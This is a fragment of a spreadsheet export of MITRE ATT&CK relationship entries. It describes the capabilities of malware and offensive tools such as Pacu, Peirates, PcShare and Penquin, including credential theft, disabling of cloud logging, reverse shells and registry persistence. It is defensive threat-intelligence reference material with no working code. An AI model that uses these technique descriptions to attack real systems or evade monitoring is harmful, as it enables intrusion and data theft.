  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) scrapes memory for properly formatted payment card data.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--145ffef4-5a63-41d7-ac74-e034e9b9622d</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) aggregates collected data in a tmp file.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--f38ae08a-0d59-41e9-a4ca-891a04297299</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is loaded and executed by a highly obfuscated launcher.(Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>relationship--1f8be617-c842-4828-a352-9d5eafb8f477</t>
  </si>
  <si>
    <t>S1091</t>
  </si>
  <si>
    <t>Pacu</t>
  </si>
  <si>
    <t>tool--1b3b8f96-43b1-4460-8e02-1f53d7802fb9</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can generate SSH and API keys for AWS infrastructure and additional API keys for other IAM users.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--9e344d1a-7b11-42fe-b406-d1a2bdc48bb1</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can automatically collect data, such as CloudFormation templates, EC2 user data, AWS Inspector reports, and IAM credential reports.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--e8edbb73-b8bf-42f5-85a3-091b3a4fd955</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) leverages the AWS CLI for its operations.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--cea62da0-1d9f-40d8-adfb-ee40f6b1a345</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate IAM users, roles, and groups. (Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--ed3fa28d-54ff-4b21-9924-58e5dcd94ac1</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) leverages valid cloud accounts to perform most of its operations.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--e47bf587-4bac-4f6b-ac2b-9ca462e95d0a</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can run commands on EC2 instances using AWS Systems Manager Run Command.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--f5287ad4-f299-49f3-9a44-d98057fa186c</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate IAM permissions.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--97115dbf-de19-4816-8c5a-5cb8b7103e8a</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS infrastructure, such as EC2 instances.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--c4cce9f3-6124-4ead-94b2-789464bd2719</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can retrieve secrets from the AWS Secrets Manager via the enum_secrets module.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--bb3c2843-b51f-4cfd-8189-0312337b8eb3</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS services, such as CloudTrail and CloudWatch.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--7a980213-1df8-481f-af86-ed105781c573</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS storage services, such as S3 buckets and Elastic Block Store volumes.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--64d9fee3-d0c8-40e5-b295-d43ec719bb81</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can create snapshots of EBS volumes and RDS instances.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--eba5e32f-2817-4833-8d65-3ccb2d9d367c</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate and download files stored in AWS storage services, such as S3 buckets.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--d4fa4797-aec0-419b-83d8-8b06ea3ac06d</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can allowlist IP addresses in AWS GuardDuty.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--a79df7b6-91d5-4019-9a86-830bc0edc2aa</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can disable or otherwise restrict various AWS logging services, such as AWS CloudTrail and VPC flow logs.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--38eefeb2-1a2f-437c-a0eb-c7d49cd5dcb6</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</si>
  <si>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</si>
  <si>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relationship--804f7690-6bf2-41dc-a6d2-59c3d4394ce5</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can collect CloudTrail event histories and CloudWatch logs.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--7a938acf-f072-42ba-8b5f-16e78ebea7f7</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can enumerate AWS security services, including WAF rules and GuardDuty detectors.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--eb046f26-d7ab-41f0-bca2-80d76db13108</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can create malicious Lambda functions.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--04f8f862-049b-40d6-8250-68ed30cd4e92</t>
  </si>
  <si>
    <t>Once inside a Virtual Private Cloud, [Pacu](https://attack.mitre.org/software/S1091) can attempt to identify DirectConnect, VPN, or VPC Peering.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--72db9534-3ac3-46df-b8ca-220727d9deb9</t>
  </si>
  <si>
    <t>[Pacu](https://attack.mitre.org/software/S1091) can search for sensitive data: for example, in Code Build environment variables, EC2 user data, and Cloud Formation templates.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>relationship--7d5cc26f-780f-4897-bae0-811e6b8bfa30</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to disable Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--d12d7d29-5616-4c87-9fd0-6375fc9c269d</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use DLL side-loading to execute malicious payloads.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--16d95f0d-fc05-4012-a1a0-35d7261b7f27</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--5c60473c-6195-4aa1-ae10-394bb5f24cf1</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--0110e04e-5812-4b69-9700-037b52d3ebb4</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can write an encrypted token to the Registry to enable processing of remote commands.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--ff495a54-08f1-4b0f-b44d-6bbeb5240225</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to compress stings with QuickLZ.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--93efb013-dab0-4b47-ac2c-0632ac2fea18</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can monitor processes on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--7a78758b-9dce-4d13-9b8a-ddc9b31d4ff7</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can start and inject code into a new `svchost` process.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--dbcbedb9-5527-4ab9-97e7-1ed65571aee9</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to install itself as a Windows service.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--a55e0219-f440-4523-9bfa-00c562824005</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to encrypt communications with D3DES.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--1b418159-e33b-407e-9849-1ebeddaa4074</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--8f27fb1d-f888-4167-a08c-781dde29755d</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) can communicate over HTTP.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--6eb2e346-3ac0-42a8-ad9a-d6e336eaf86a</t>
  </si>
  <si>
    <t>[Pandora](https://attack.mitre.org/software/S0664) has the ability to gain system privileges through Windows services.(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--60331850-dfc3-4769-9790-1be664aa63c2</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--e7126875-bb0f-48d0-845f-6b8951ce8507</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--c8480a31-f2ef-4de2-82b2-95b1ddedec2e</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--ab27d055-77bb-4a3d-89b2-771e532f7384</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--80383098-470f-4293-b4b1-90c4362be307</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--ac89c5e2-ade5-4889-a905-7dbe835ff5fd</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve lists of running processes.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--53a8ee3f-f261-46d5-a6eb-512735867ee2</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.(Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>relationship--c5087d19-7d99-4106-9dc7-407c7de710be</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) can perform pass the hash.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>relationship--1dc42b4c-4a93-4fc6-bad3-b5498ad500b1</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has used RSA encrypted communications with C2.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--27fb153f-0d50-4d95-b0e2-05bb520e33a7</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--9a8d5690-94b9-46d2-a383-6f26a3c25c80</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can remove its log file from disk.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--3179774b-9b7a-4720-850c-23c7b04d26c6</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--1057a87e-4ae4-4317-b655-0fab5a17e7e2</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has sent its public key to the C2 server over TCP.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--66200ea6-03b8-4c4f-a1d4-9041ddc70d8a</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can stop the MS SQL service at the end of the encryption process to release files locked by the service.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--287368b4-d3ed-489d-9fe2-288168763ac4</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) has the ability to gather the hostname of the victim machine.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--85b17ee3-cd16-4f7d-bfaa-23e756f344d5</t>
  </si>
  <si>
    <t>[Pay2Key](https://attack.mitre.org/software/S0556) can identify the IP and MAC addresses of the compromised host.(Citation: Check Point Pay2Key November 2020)</t>
  </si>
  <si>
    <t>relationship--e11c6406-2144-4116-a29c-852df46b5ff6</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has created the `HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32` Registry key for persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--56ec7ed1-99a1-44bf-8106-d3c23ce16dc8</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can collect files and information from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--86ba3af5-2fdf-4fe3-8a89-da24cc0e0165</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--8a36b1bf-52a8-4e93-bac2-e28c60b7d64d</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can upload files and information from a compromised host to its C2 servers.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--c7f04f79-4bda-4abf-8f74-4faad8a09f19</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has deleted its files and components from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--acc88c1c-1906-4643-92a7-bd5397a5ae2e</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used an invalid certificate in attempt to appear legitimate.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--c845732e-054e-4915-81d2-7c5e36da9eb7</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has the ability to capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--612c9ce1-a4d6-45bb-b807-5808207c6c45</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--095d33b5-523d-40ae-aad9-448910d527d3</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can delete its persistence mechanisms from the registry.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--d45fe5a0-f9e5-4f05-b40b-8693c8eab0f7</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used a variety of Windows API functions.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--dbfabc52-92a7-4814-aec8-27f2afe816e5</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has been encrypted with XOR using different 32-long Base16 strings and compressed with LZW algorithm.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--4f061157-0a1d-4c2d-9bd3-e5b0b932a39f</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can obtain a list of running processes on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--1d6eb87c-6ed9-4432-a51c-b0ef70190120</t>
  </si>
  <si>
    <t>The [PcShare](https://attack.mitre.org/software/S1050) payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--de8cda8f-cb21-4cd9-9ce8-a2f100f723a6</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can search the registry files of a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--9fedbd2e-93d1-4693-8365-f25ae4374e6a</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used `rundll32.exe` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--8925d506-5fa7-4d8d-82bd-09c650029469</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can take screen shots of a compromised machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--1f7e10b8-f8ea-4731-af67-7201452d32be</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\r\n`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--269bab05-022c-4fb8-bdf3-1ec721ff994e</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can capture camera video as part of its collection process.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fd9c0570-d19a-49b6-a354-d3eaa25b00f2</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) has used HTTP for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--1cadb8d8-d569-4d02-9e0c-f20d71e37cda</t>
  </si>
  <si>
    <t>[PcShare](https://attack.mitre.org/software/S1050) can execute `cmd` commands on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--4585a60a-acbd-4fd2-b421-b25dd920632c</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--238e1f61-36d8-41a9-b480-bb35cb30d21d</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use stolen service account tokens to perform its operations.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--c37d24cf-8ea8-4212-831e-bc3f37c10893</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can query the query AWS and GCP metadata APIs for secrets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--bc953a16-2049-4050-8790-5efb54be6e34</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can list AWS S3 buckets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--9f2ee173-a4b2-45d9-8dfe-537f1fc82ef4</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can query the Kubernetes API for secrets.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--8be7c428-5ef7-43ff-8a68-2ac3f577bb4b</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can use `kubectl` or the Kubernetes API to run commands.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--17530a5c-d0a2-4a4d-8617-d0659b443e3a</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can enumerate Kubernetes pods in a given namespace.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--09f92a2f-282d-484e-a3c9-b0fc603a1fb4</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--2cf91706-674a-4ae0-8a4c-0d8d43eb6e1a</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--71d8ce83-3410-4bf2-b30c-a3aa4c8a931d</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can gain a reverse shell on a host node by mounting the Kubernetes hostPath.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--19df36ab-4da3-4077-8b83-6066a546f2e2</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) can initiate a port scan against a given IP address.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--679707b5-84d8-473d-9d28-e92a7d16763a</t>
  </si>
  <si>
    <t>[Peirates](https://attack.mitre.org/software/S0683) gathers Kubernetes service account tokens using a variety of techniques.(Citation: Peirates GitHub)</t>
  </si>
  <si>
    <t>relationship--c13ac561-878f-4119-b5b1-39994f7c25df</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--9ce465d9-921b-4d6d-8863-b1ffc63f0e8e</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use Cron to create periodic and pre-scheduled background jobs.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--7bd145ae-5ad2-48cc-8438-5b9ec8ed5414</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_upload&lt;/code&gt; to send files to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--c92d9edc-e2a9-44e4-95ef-81632eaf14f9</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can delete downloaded executables after running them.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--f476b228-f729-4809-b40e-6c402da30c5d</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can use the command code &lt;code&gt;do_vslist&lt;/code&gt; to send file names, size, and status to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--d0a2aa1e-a824-47b8-99a5-c2d026c9432d</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can remove strings from binaries.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--ab009520-dffe-4494-9468-0189060cca01</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_download&lt;/code&gt; to retrieve remote files from C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--729f4b9b-2d25-4e69-9a9b-adaa62c2ee31</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can add the executable flag to a downloaded file.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--c270ebd7-56e2-4ede-bd45-57da4a0065f2</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has mimicked the Cron binary to hide itself on compromised systems.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--6ef55051-c152-4491-a881-31ff98fb773e</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can sniff network traffic to look for packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>relationship--9148cfab-450f-4aa7-a427-3ddf8e8d686a</t>
  </si>
  <si>
    <t>The [Penquin](https://attack.mitre.org/software/S0587) C2 mechanism is based on TCP and UDP packets.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--ce59452d-d258-435f-aa91-329de56eba8e</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) has encrypted strings in the binary for obfuscation.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--fa211b49-7df8-4283-8a70-78b4b81bbba9</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) installs a `TCP` and `UDP` filter on the `eth0` interface.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--cdf000de-7faa-4251-b1f0-d08e043ef16a</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the file system type and disk space of a compromised host to C2.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--e2b67455-4986-46f4-a4ff-f5ee215ef998</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can report the IP of the compromised host to attacker controlled infrastructure.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--48318986-6d46-436a-b9ff-dd2ac1ab32a2</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) will connect to C2 only after sniffing a "magic packet" value in TCP or UDP packets matching specific conditions.(Citation: Leonardo Turla Penquin May 2020)(Citation: Kaspersky Turla Penquin December 2014)</t>
  </si>
  <si>
    <t>relationship--5488dd31-2a28-4250-89ff-963214f46b92</t>
  </si>
  <si>
    <t>[Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020)</t>
  </si>
  <si>
    <t>relationship--228c84a6-e6fa-45f3-9f89-36a0c95fb1e7</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) has the ability to automatically exfiltrate files and keylogs.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--672f33f6-bdc1-40b2-a208-888d1002cc25</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can identify specific files for exfiltration.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--922af0dd-415c-4512-9fe2-710a954f4c80</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can download and execute remote files.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--2bfc128f-2bc9-436b-abe0-4206b9e35727</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can log keystrokes on compromised hosts.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--0a37825f-2f48-4810-8d5e-a4421d1fe122</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can take screenshots on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--6c10bd99-6932-451d-b739-13adf1276a22</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) can use HTTP to communicate with C2.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--2e50e37b-29fd-48a7-8692-9f928ef9d36f</t>
  </si>
  <si>
    <t>[Peppy](https://attack.mitre.org/software/S0643) has the ability to execute shell commands.(Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>relationship--4f351992-297b-45b0-b931-7b19875cd0ec</t>
  </si>
  <si>
    <t>[Pillowmint](https://attack.mitre.org/software/S0517) has used a malicious shim database to maintain persistence.(Citation: Trustwave Pillowmint June 2020)</t>
  </si>
  <si>
    <t>relationship--09896887-98ee-4e8a-9cc2-4203b3b561c8</t>
  </si>
  <si>
    <t>27 July 2020</t>
  </si>
  <si>
    <t xml:space="preserve">[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)	</t>
  </si>
  <si>
